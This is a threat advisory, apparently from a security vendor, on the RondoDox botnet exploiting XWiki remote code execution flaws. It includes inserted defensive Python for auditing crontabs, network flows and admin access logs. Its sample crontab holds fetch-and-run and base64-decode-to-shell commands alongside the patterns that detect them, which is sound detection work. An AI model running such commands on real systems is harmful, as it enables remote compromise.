
RondoDox Botnet Actively Exploits Unpatched XWiki Server Vulnerabilities: Threat Analysis and Mitigation Strategies

  • Rescana
  • 7 days ago

Executive Summary

The emergence of the RondoDox botnet campaign marks a significant escalation in the exploitation of unpatched XWiki servers, leveraging known vulnerabilities to conscript these systems into a rapidly expanding botnet infrastructure. XWiki, a widely adopted open-source enterprise wiki platform, has become a high-value target due to its prevalence in knowledge management and collaboration environments across diverse sectors. The RondoDox threat actor exploits unpatched instances of XWiki by weaponizing remote code execution vulnerabilities, enabling the deployment of malicious payloads that facilitate lateral movement, data exfiltration, and further propagation of the botnet. This advisory provides a comprehensive technical analysis of the RondoDox campaign, its tactics, techniques, and procedures (TTPs), observed exploitation in the wild, victimology, and actionable mitigation strategies. Executives and technical stakeholders are urged to prioritize patch management and implement robust security controls to mitigate the risk posed by this evolving threat.

Threat Actor Profile

The RondoDox threat actor is characterized by a high degree of technical sophistication and operational agility, leveraging automated reconnaissance and exploitation frameworks to identify and compromise vulnerable XWiki servers globally. While attribution remains inconclusive, telemetry and behavioral analysis suggest that RondoDox operates as a financially motivated cybercriminal group with a focus on botnet monetization through distributed denial-of-service (DDoS) attacks, proxy rental services, and potential ransomware deployment. The group demonstrates a rapid adaptation to public disclosures of vulnerabilities, integrating new exploits into its arsenal within days of proof-of-concept (PoC) publication. RondoDox maintains a decentralized command-and-control (C2) infrastructure, utilizing fast-flux DNS and encrypted communication channels to evade detection and takedown efforts. The actor’s targeting of XWiki aligns with a broader trend of exploiting enterprise collaboration platforms to maximize impact and persistence.

Technical Analysis of Malware/TTPs

The RondoDox botnet leverages a multi-stage infection chain, beginning with the exploitation of unpatched XWiki vulnerabilities such as CVE-2023-35150 and CVE-2023-26482, which enable unauthenticated remote code execution. Upon successful exploitation, the attacker deploys a lightweight dropper that establishes initial persistence by modifying startup scripts and leveraging cron jobs or Windows Task Scheduler, depending on the underlying operating system. The dropper retrieves the primary botnet payload from a remote server, employing obfuscation techniques such as base64 encoding and custom packers to evade signature-based detection.
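The dropper persistence described above (startup-script and cron-job modifications, base64-obfuscated payloads) is something a responder can triage quickly from a dumped crontab. The following is an added example, not code from the advisory or from Rescana: it scans a crontab for the generic indicator patterns named in the text. The sample crontab, the IP address and the indicator regexes are all constructed for illustration.

```python
import re

# Constructed sample crontab (not taken from the advisory): two benign jobs plus three
# entries shaped like the persistence patterns the advisory describes.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.55:8443/u | sh
@reboot echo ZWNobyBoaQ== | base64 -d | sh
30 * * * * /opt/backup/run.sh
* * * * * /tmp/.x/update
"""

# Heuristics a responder applies to each cron command. These are generic indicator
# patterns, not signatures for any specific sample.
PATTERNS = {
    "download-and-execute": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "temp-dir-exec": re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+"),
}


def split_cron_entry(line):
    """Split a crontab line into (schedule, command); handles @reboot-style schedules."""
    tokens = line.split()
    if tokens[0].startswith("@"):
        return tokens[0], " ".join(tokens[1:])
    return " ".join(tokens[:5]), " ".join(tokens[5:])


def audit_crontab(text):
    """Return the entries whose command matches at least one indicator pattern."""
    flagged = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Environment assignments such as PATH=/usr/bin carry no command; skip them.
        if "=" in line.split()[0]:
            continue
        schedule, command = split_cron_entry(line)
        reasons = [name for name, rx in PATTERNS.items() if rx.search(command)]
        if reasons:
            flagged.append({"schedule": schedule, "command": command, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for entry in audit_crontab(SAMPLE_CRONTAB):
        print(entry["schedule"], "|", entry["command"], "->", ", ".join(entry["reasons"]))
```

Run it against `crontab -l` output for each local user and the files under `/etc/cron.d`; a hit is a lead for manual review, not a verdict, since legitimate automation occasionally pipes downloads into a shell.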

The core RondoDox malware exhibits a modular architecture, supporting plug-ins for DDoS attack orchestration, credential harvesting, lateral movement via SMB and RDP brute-forcing, and proxy relay functionality. The malware communicates with its C2 infrastructure using HTTPS over non-standard ports, with fallback mechanisms utilizing DNS tunneling in the event of network filtering. Notably, RondoDox incorporates anti-analysis features, including sandbox evasion, process hollowing, and periodic self-updates to maintain operational resilience. The botnet’s propagation module scans for additional vulnerable XWiki instances and other web applications, leveraging known exploits to maximize infection rates.
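The two C2 channels described above, HTTPS on non-standard ports with a DNS-tunneling fallback, each leave a network-level trace that can be checked without any sample-specific signature. The following is an added example, not code from the advisory or from Rescana: it applies two heuristics to constructed flow and DNS records and reports hosts that show both behaviours. The flow tuple layout, the query names and the thresholds (label length over 30, entropy at or above 3.5 bits) are assumptions for illustration and should be tuned against a baseline of normal traffic.

```python
import math
from collections import Counter

# Constructed sample flow records: (src_ip, dst_ip, dst_port, app_proto, bytes_out).
SAMPLE_FLOWS = [
    ("10.0.5.20", "203.0.113.10", 443, "tls", 12_000),
    ("10.0.5.20", "203.0.113.55", 8443, "tls", 250_000),
    ("10.0.5.20", "198.51.100.7", 4443, "tls", 180_000),
    ("10.0.5.21", "203.0.113.10", 443, "tls", 3_000),
    ("10.0.5.21", "10.0.5.1", 53, "dns", 900),
]

# Constructed sample DNS queries: (src_ip, query_name). The long labels are base64 text.
SAMPLE_DNS = [
    ("10.0.5.20", "www.example.com"),
    ("10.0.5.20", "aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Q.c2.example.net"),
    ("10.0.5.20", "dGhpcyBpcyBhbm90aGVyIGNodW5rIG9mIGRhdGE.c2.example.net"),
    ("10.0.5.21", "mail.example.com"),
]


def shannon_entropy(s):
    """Bits of entropy per character; random-looking or encoded labels score high."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def flag_nonstandard_tls(flows, standard_ports=frozenset({443})):
    """TLS sessions to ports other than the ones the environment expects."""
    return [f for f in flows if f[3] == "tls" and f[2] not in standard_ports]


def flag_dns_tunneling(queries, max_label_len=30, min_entropy=3.5):
    """Queries whose leftmost label is unusually long or high-entropy, which is how
    encoded data tends to look when it is smuggled through DNS."""
    flagged = []
    for src, name in queries:
        first = name.rstrip(".").split(".")[0]
        reasons = []
        if len(first) > max_label_len:
            reasons.append("long-label")
        if len(first) >= 8 and shannon_entropy(first) >= min_entropy:
            reasons.append("high-entropy")
        if reasons:
            flagged.append((src, name, reasons))
    return flagged


def hosts_with_both_indicators(flows, queries):
    """Hosts showing nonstandard-port TLS *and* tunnelling-shaped DNS, i.e. both the
    primary channel and the fallback the advisory attributes to this malware."""
    tls_hosts = {f[0] for f in flag_nonstandard_tls(flows)}
    dns_hosts = {q[0] for q in flag_dns_tunneling(queries)}
    return sorted(tls_hosts & dns_hosts)


if __name__ == "__main__":
    print("nonstandard TLS:", flag_nonstandard_tls(SAMPLE_FLOWS))
    print("DNS tunnelling candidates:", flag_dns_tunneling(SAMPLE_DNS))
    print("hosts with both:", hosts_with_both_indicators(SAMPLE_FLOWS, SAMPLE_DNS))
```

Either heuristic alone produces false positives (legitimate services on 8443, long CDN hostnames); requiring both on the same host, or adding a count of unique subdomains per zone, is what makes the result worth an analyst's time.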

Exploitation in the Wild

Active exploitation of unpatched XWiki servers by the RondoDox botnet has been observed since early 2024, with a marked increase following the public disclosure of critical vulnerabilities. Threat intelligence feeds and honeypot telemetry indicate that the initial infection vector typically involves automated scanning for exposed XWiki endpoints, followed by exploitation of remote code execution flaws. Compromised servers are rapidly assimilated into the botnet, with infection chains often completing within minutes of vulnerability exposure.

Incident reports highlight that RondoDox-infected servers are subsequently leveraged for secondary attacks, including DDoS campaigns targeting financial services, healthcare providers, and educational institutions. Forensic analysis reveals that the malware frequently disables security monitoring agents and modifies firewall rules to maintain persistence and facilitate outbound C2 communication. The campaign’s global footprint encompasses North America, Europe, and Asia-Pacific, with a concentration of incidents in organizations with delayed patch cycles and limited network segmentation.

Victimology and Targeting

The primary victims of the RondoDox campaign are organizations operating unpatched XWiki servers, particularly those in sectors with high reliance on collaborative knowledge management platforms. Affected industries include technology, education, healthcare, and government, with both public and private sector entities reporting incidents. The targeting appears opportunistic, driven by automated reconnaissance rather than specific industry focus, although high-value organizations with extensive digital footprints are disproportionately impacted.

Analysis of infection telemetry suggests that small and medium-sized enterprises (SMEs) are especially vulnerable due to resource constraints and limited security maturity. However, several large enterprises have also been compromised, underscoring the criticality of timely vulnerability management. The botnet’s propagation mechanisms enable rapid lateral movement within compromised networks, increasing the risk of data exfiltration, service disruption, and further malware deployment.

Mitigation and Countermeasures

To mitigate the risk posed by the RondoDox botnet, organizations must prioritize the immediate patching of all XWiki instances, ensuring that the latest security updates addressing CVE-2023-35150, CVE-2023-26482, and related vulnerabilities are applied. It is essential to conduct comprehensive vulnerability assessments of public-facing web applications, with a focus on identifying and remediating remote code execution flaws.

Network segmentation should be enforced to limit lateral movement, and access to XWiki administrative interfaces must be restricted to trusted IP ranges using firewall rules and VPN access. Security monitoring should be enhanced through the deployment of endpoint detection and response (EDR) solutions capable of identifying anomalous process behavior, unauthorized script execution, and suspicious outbound network traffic. Organizations are advised to implement application whitelisting, disable unnecessary services, and regularly audit user privileges to minimize the attack surface.
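The control above, restricting the XWiki administrative interface to trusted IP ranges, is only as good as its verification. The following is an added example, not code from the advisory or from Rescana: it audits a web server access log for admin-UI requests arriving from outside the trusted ranges, which is the check to run after the firewall or reverse-proxy rule is in place. The log excerpt, the trusted networks and the admin path prefix `/xwiki/bin/admin/` are assumptions for illustration; confirm the prefix against your deployment's context path.

```python
import ipaddress
import re

# Constructed sample access-log excerpt in common log format (not from the advisory).
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [12/Nov/2025:10:01:02 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5123
203.0.113.9 - - [12/Nov/2025:10:01:05 +0000] "GET /xwiki/bin/admin/XWiki/XWikiPreferences HTTP/1.1" 200 9801
10.0.4.15 - - [12/Nov/2025:10:02:11 +0000] "GET /xwiki/bin/admin/XWiki/XWikiPreferences HTTP/1.1" 200 9801
198.51.100.23 - - [12/Nov/2025:10:03:40 +0000] "POST /xwiki/bin/admin/XWiki/XWikiPreferences HTTP/1.1" 302 0
malformed line that the parser should skip
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed trusted source ranges (corporate LAN plus a VPN egress block); adjust per environment.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.0.2.0/24")]

# Assumed path prefix of the XWiki administration UI; add further prefixes as your
# deployment requires.
ADMIN_PREFIXES = ("/xwiki/bin/admin/",)


def is_trusted(ip_text, nets=TRUSTED_NETS):
    """True when the address parses and falls inside one of the trusted networks."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in nets)


def audit_admin_access(log_text, nets=TRUSTED_NETS, prefixes=ADMIN_PREFIXES):
    """Return (ip, method, path, status) for admin-UI requests from outside the trusted
    ranges. Redirected and failed attempts are reported too: a 302 from an untrusted
    source still means the request reached the application instead of being dropped."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if path.startswith(prefixes) and not is_trusted(m["ip"], nets):
            hits.append((m["ip"], m["method"], path, int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in audit_admin_access(SAMPLE_ACCESS_LOG):
        print("untrusted admin access:", hit)
```

If the server sits behind a reverse proxy, parse the forwarded client address (for example `X-Forwarded-For` as logged by the proxy) rather than the proxy's own IP, or every request will appear trusted.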

Incident response plans should be updated to include procedures for the containment and eradication of botnet infections, with emphasis on forensic analysis and system restoration from known-good backups. Threat intelligence feeds should be integrated into security operations to facilitate early detection of emerging exploitation campaigns. Finally, user awareness training should be conducted to reinforce the importance of timely patching and adherence to security best practices.

References

Public advisories and technical analyses relevant to this campaign include the official XWiki security advisories for CVE-2023-35150 and CVE-2023-26482, threat intelligence reports from leading cybersecurity vendors, and MITRE ATT&CK documentation on botnet TTPs. Additional resources include open-source PoC repositories, security community forums, and incident response case studies detailing RondoDox-related activity.

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to continuously monitor, assess, and mitigate cyber risks across their digital supply chains. Our platform empowers security teams to gain actionable insights, automate risk assessments, and enhance resilience against emerging threats. For more information or to discuss your organization’s cybersecurity needs, we are happy to answer questions at ops@rescana.com.
